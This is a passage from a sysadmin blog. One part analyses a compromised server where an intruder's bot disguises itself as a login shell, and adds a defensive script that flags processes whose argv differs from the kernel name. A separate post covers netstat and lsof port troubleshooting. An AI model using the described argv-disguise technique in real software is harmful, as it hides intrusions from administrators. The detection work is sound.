    Downloading a patch for the CABAL online game; he is using the server as a download box.
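The listings above disagree about what PID 2709 is: lsof and top call it x, ps and netstat -p call it -bash. lsof and top print the kernel's process name (comm, set from the executable name at exec time); ps and netstat print argv, which a process can rewrite, and this bot rewrote it to pass as a login shell. The script below is an added example, not part of the original post: it compares the two from a single ps listing (a constructed one carrying the post's processes) and flags the mismatch. Two things the post does not do and a responder would: check how x.tar.gz got there, by reading the web server's access log around Jun 6 05:48, and reset loon's password, since the intruder is logging in as loon over SSH.

```shell
#!/usr/bin/env bash
# Added example (not from the original post): find processes whose argv has
# been rewritten, by comparing the kernel's process name (comm) with argv[0]
# from one ps listing.
LC_ALL=C; export LC_ALL

# argv_spoof_check < "$(ps -eo pid=,user=,comm=,args=)"
# Prints a SPOOFED line wherever basename(argv[0]) disagrees with comm.
argv_spoof_check() {
  awk '
    NF < 4 { next }
    {
      pid = $1; user = $2; comm = $3; argv0 = $4
      if (argv0 ~ /^\[/) next             # kernel threads: args is "[kthreadd]"
      n = split(argv0, p, "/"); base = p[n] # strip the path
      sub(/^-/, "", base)                 # login shells set argv[0] to "-bash"
      sub(/:$/, "", base)                 # daemons such as "sshd: loon@pts/3"
      # comm is truncated to 15 characters by the kernel
      if (substr(base, 1, 15) != comm)
        print "SPOOFED pid=" pid " user=" user " comm=" comm " argv0=" argv0
    }'
}

# Constructed ps listing (pid, user, comm, args) with the processes seen in
# the post, in the column order ps -eo pid=,user=,comm=,args= produces.
sample_ps() {
  cat <<'EOF'
 1006 mysql    mysqld          /usr/libexec/mysqld --basedir=/usr --datadir=/var/lib/mysql
 1565 root     master          /usr/libexec/postfix/master
 1568 postfix  qmgr            qmgr -l -t fifo -u
 2709 loon     x               -bash -m x3
24370 loon     sshd            sshd: loon@pts/3
24371 loon     bash            -bash
10053 loon     wget            wget http://bayou.asiasoft.net/CABAL/pds/Manual%20Patch%20090609.exe
    2 root     kthreadd        [kthreadd]
EOF
}

spoof_sample() { sample_ps | argv_spoof_check; }

# Once a PID is flagged, the kernel still knows what it really runs:
#   ls -l /proc/2709/exe /proc/2709/cwd       # real binary and working directory
#   tr '\0' ' ' < /proc/2709/cmdline; echo    # the rewritten argv
#   ps -o lstart= -p 2709                     # start time, to line up with logs
```

Expect some legitimate hits on a real box (interpreters, anything that sets its own process title); each one is explained in a minute with the /proc checks above, and a web-root binary with a shell's name is not one of them.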



    Monday, December 8, 2008

    simple commands for troubleshooting network applications

    Most of the time when I troubleshoot a network application, these are the few commands I use, together with the logs.

    1st, netstat
    2nd, lsof

    On the server itself you can use the commands below.
    1st, netstat
    [root@www errs]# netstat -an|grep 3306
    tcp 0 0 0.0.0.0:3306 0.0.0.0:* LISTEN

    note: see, the port is open, listening on all interfaces :P


    2nd, lsof
    [root@www errs]# lsof -i tcp:3306
    COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME
    mysqld 7472 mysql 10u IPv4 12294 TCP *:mysql (LISTEN)

    See, port 3306 is used by the service mysqld,
    its PID is 7472,
    and its USER is mysql, and so on.


    lsof in particular tells you which application is bound to a particular port.
    Explore lsof more :P you will get a lot out of this command.



    From a client, try it and see whether the firewall blocks it or not :P
    C:\Documents and Settings\a13x>telnet www.aviocall.com 3306
    Connecting To www.aviocall.com...Could not open connection to the host, on port
    3306: Connect failed

    See, it fails to connect. I believe my firewall blocks it.

    Let's see the log from the server:
    Dec 8 17:56:11 www kernel: Shorewall:net2all:DROP:IN=eth0 OUT= MAC=00:1e:68:9a:f6:19:00:13:7f:c4:47:1a:08:00 SRC=118.100.42.9 DST=203.114.11.102 LEN=48 TOS=0x00 PREC=0x00 TTL=113 ID=40540 DF PROTO=TCP SPT=50960 DPT=3306 WINDOW=65535 RES=0x00 SYN URGP=0
    Dec 8 17:56:15 www psad: scan detected: 118.100.42.9 -> 203.114.11.102 tcp: [3306] flags: SYN tcp pkts: 1 DL: 1
    See the log: the kernel line is the firewall (Shorewall) dropping an inbound SYN to destination port 3306 from the client's IP, and psad reports the same packet as a scan :P
    That means my firewall blocks it :P

    So the conclusion is that the MySQL port 3306 is only accessible from localhost or certain IP addresses :P


    That's all for this part. Once you know the root cause, you can do the actual troubleshooting.


    Another way: use a sniffer like Wireshark or tcpdump to troubleshoot it :P
    You can get much more out of that :P but I don't plan to teach it, as I am not really good with Wireshark and it is a dangerous tool for people with an evil mindset :P